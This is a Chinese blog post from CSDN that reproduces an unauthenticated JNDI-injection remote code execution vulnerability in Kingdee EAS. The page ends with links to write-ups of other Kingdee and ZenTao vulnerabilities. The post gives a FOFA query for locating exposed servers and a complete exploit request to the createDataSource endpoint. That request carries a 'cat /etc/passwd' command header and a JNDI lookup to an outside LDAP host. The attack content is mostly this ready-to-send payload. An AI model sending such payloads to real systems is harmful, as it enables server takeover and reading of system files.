【漏洞复现】金蝶 EAS createdatasource jndi 远程代码执行漏洞

最新推荐文章于 2024-04-27 17:30:42 发布
最新推荐文章于 2024-04-27 17:30:42 发布
阅读量150 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/137354235
版权

0x01 产品简介

金蝶 EAS 是金蝶软件公司推出的一套企业级应用软件套件,旨在帮助企业实现全面的管理和业务流程优化。

0x02 漏洞概述

金蝶 EAS 存在JNDI注入漏洞,未授权的攻击者可以通过该漏洞进行远程代码执行,导致服务器被控制。

0x03 测绘语句

fofa: app="Kingdee-EAS"

0x04 漏洞复现

​
POST /appmonitor//protect/datasource/createDataSource HTTP/1.1

Host:

Cmd: cat /etc/passwd

Content-Type: application/x-www-form-urlencoded

Referer: https://xxxx

name=1234&jndiName=ldap://gobygo.net/A7&dbtype=mysql&drivertype=&host=127.0.0.1&port=3306&dbname=asdasxasx&userName=asdasxasx&password=asdasxasx&repassword=asdasxasx&connectionURL=sdasd&driverClassName=java.lang.String&testCommand=

​

了解本专栏 订阅专栏 解锁全文 超级会员免费看
从不学安全
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
金蝶 EASEAS Cloud任意文件上传漏洞复现
0xSec
11-20 1066
金蝶 EASEAS Cloud 在 uploadLogo.action 接口处存在文件上传漏洞,攻击者可以利用文件上传漏洞执行恶意代码、写入后门、从而可能导致服务器受到攻击并被控制。
金蝶云ScpSupRegHandler任意文件上传漏洞复现
最新发布
The current road is different, love needs to distinguish between right and wrong
05-16 127
金蝶云星空管理中心ScpSupRegHandler接口存在任意文件上传漏洞。攻击者可在无需登录的情况下利用构造的文件名(如使用"../../../../"等路径穿越技巧)将恶意脚本文件上传至服务器上的非预期目录,最终可导致远程执行恶意命令,控制服务器。没有人规定,一朵花,一定要成长为向日葵或者玫瑰。
禅道项目管理系统身份认证绕过漏洞
huangyongkang666的博客
04-27 1380
禅道项目管理软件是国产的开源项目管理软件,专注研发项目管理,内置需求管理、任务管理、bug管理、缺陷管理、用例管理、计划发布等功能,完整覆盖了研发项目管理的核心流程。禅道项目管理系统存在身份认证绕过漏洞远程攻击者利用该漏洞可以绕过身份认证,调用任意API接口并修改管理员用户的密码,并以管理员用户登录该系统,配合其他漏洞进一步利用后,可以实现完全接管服务器16.x
金蝶EASEAS Cloud远程代码执行漏洞
hackzkaq的博客
10-13 680
金蝶 EASEAS Cloud 存在远程代码执行漏洞
金蝶 EASEAS Cloud任意文件上传漏洞
weixin_52204925的博客
01-25 793
金蝶 EASEAS Cloud任意文件上传漏洞
复现金蝶EAS系统 文件读取漏洞_13
fushuang333的博客
01-09 1187
复现金蝶EAS 任意文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感信息文件,正常读取的文件没有经过校验或者不严格,用户可以控制这个变量读取任意文件。
金蝶EAS数据库表结构万能版本数据字典
11-07
适配不同的EAS版本,通过可视化的GUI界面输入表名或者实体名等查找对应表结构,结构内内容详细,清晰。是配合BOS 开发的利器,大大提升开发效率和运维效率。使用方便,仅需配合EAS客户端,一键脚本运行。内含详细使用...
金蝶EAS8.5数据字典(全部表结构说明)
08-16
金蝶EAS8.5数据字典,全部表结构说明,包含超级详细的表、字段说明,以及关联字段说明。
金蝶EAS DEP脚本汇总.docx
12-17
金蝶EAS DEP脚本汇总 在金蝶EAS系统中,DEP脚本是一种基于JavaScript语法的脚本语言,用于扩展系统的功能。下面是DEP脚本的详细知识点: 一、基本概念 DEP脚本是一种基于JavaScript语法的脚本语言,用于扩展金蝶...
金蝶EAS V8.5 发版说明.pdf
10-03
金蝶EAS V8.5 发版说明 产品简介 时代在快速发生着变化,人工智能、区块链、云计算、大数据、IOT 等新技术在广泛影 响着社会的发展,同时企业管理也在发生的变化:组织边界模糊、多元共生、个体崛起、共 享管理等,...
金蝶EAS-V8.1-工作流数据库表参考
04-13
金蝶EAS_V8.1_工作流数据库表参考
金蝶EAS V8.2 发版说明.pdf
03-19
金蝶EAS V8.2 发版说明
java导致敏感信息泄漏的异常_金蝶AES系统Java web配置文件敏感信息泄露漏洞
weixin_42123296的博客
03-09 836
### 0x01 漏洞框架金蝶软件始创于1993年,是一家ERP、财务等企业管理软件厂商,拥有官网(kigndee.com)、友商网(youshang.com)、快递100(kuaidi100.com)、云之家(kdweibo.com)等互联网业务应用官方主页:www.kingdee.com客户案例:![](https://images.seebug.org/contribute/f1e376de...
某蝶EAS(Enterprise Application Suite)平台myUploadFile接口任意文件上传漏洞复现 CNVD-2023-57598
afei001
10-17 523
某蝶EAS(Enterprise Application Suite)是金某集团开发的一套企业级应用软件解决方案。它是一款集成化的企业管理软件,旨在帮助企业实现业务流程的数字化、自动化和优化。金蝶EAS提供了多个功能模块,涵盖了企业的各个方面,包括财务管理、人力资源管理、供应链管理、生产制造管理、销售与客户关系管理、项目管理等。这些模块可以根据企业的需求进行灵活的配置和定制,以满足不同行业和规模企业的管理需求。 某蝶EAS平台myUploadFile接口存在任意文件上传漏洞,攻击者可利用该
金蝶EAS,后台抛出业务异常,中断程序
MZ199290的博客
04-27 498
在后台抛出业务异常时,会在前端界面弹出消息提示框,并中断程序。 在前端页面(EAS客户端,GUI)中断程序时可使用abort(),但是abort()仅用于中断程序,消息提示需在中断之前处理。 /** * 抛出业务异常 */ public void throwBizException(String msg) throws EASBizException{ throw new EAS...
金蝶EAS服务端跳过权限检查
小昌呀的EAS开发专栏
10-03 336
ctx.put("disablePermissionForKScript",true);
zentao linux 伪静态,禅道pms路由及漏洞分析
weixin_28811007的博客
05-14 593
本帖最后由 xmidf 于 2018-9-29 09:28 编辑前言故事起源于一次校园网内扫描,扫到一台禅道的服务器,遂开始分析起了一些历史漏洞,但是由于版本原因在服务器上都没有成功文本分析了下禅道中路由的设置,以及一些历史漏洞,若有疏漏,还望斧正。路由分析路由是分析和审计cms前一个很重要的点,能了解整个cms的基本框架和代码流程。禅道各个版本中路由没有什么较大的变化,这里以9.1.2为例进行分...
金蝶-EAS easWebClient 任意文件读取漏洞复现
02-20 1032
金蝶-EAS是一款面向大中型企业的管理软件,涵盖了财务、人力资源、采购、库存等多个功能模块,支持云计算和个性化定制,适合集团企业管理使用。
0day禅道项目管理系统身份认证绕过漏洞
weixin_43167326的博客
04-26 1268
禅道(ZenTao)是一款国产的,基于LGPL协议和敏捷方法scrum,开源免费的项目管理软件。禅道内置需求管理、任务管理、bug管理、缺陷管理、用例管理、计划发布等功能,实现了软件的完整生命周期的全面覆盖。
金蝶eas文件上传漏洞
10-13
关于金蝶eas文件上传漏洞,我可以提供一些基本信息。该漏洞是指攻击者可以通过上传恶意文件来执行任意代码,从而获取系统权限。这个漏洞存在于金蝶eas的文件上传功能中,攻击者可以通过构造特定的上传请求来绕过文件类型检查和安全限制。 为了防止这种漏洞的发生,金蝶eas的开发者应该加强对文件上传功能的安全性检查,例如限制上传文件的类型、大小和数量等。此外,还可以采用一些防御措施,如使用反病毒软件、禁用不必要的服务和端口等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值